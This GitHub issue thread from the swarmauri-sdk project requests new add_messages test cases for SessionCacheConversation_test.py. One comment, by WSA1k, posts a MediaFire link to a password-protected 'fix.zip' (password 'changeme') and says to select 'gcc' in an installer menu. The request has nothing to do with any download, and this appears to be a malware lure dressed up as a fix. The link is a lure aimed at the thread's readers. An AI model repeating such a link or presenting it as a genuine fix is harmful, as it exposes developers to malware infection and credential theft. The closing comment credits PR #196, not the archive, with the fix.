### ISSUE TITLE
[Update Test Case Configuration]: SessionCacheConversation_test.py

### ISSUE THREAD

**Issue by cobycloud** [swarmauri/swarmauri-sdk#189]
### Outdated/Incorrect Configuration Area

SessionCacheConversation_test.py

### Reason for Update

Missing test cases for add_messages

### Proposed Configuration Update

use list of messages to add set of messages to conversation at a single time

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RafaelJohn9** [comment]
the proposed `potential solution` mention above fixed this issue. It was fixed by  PR #196
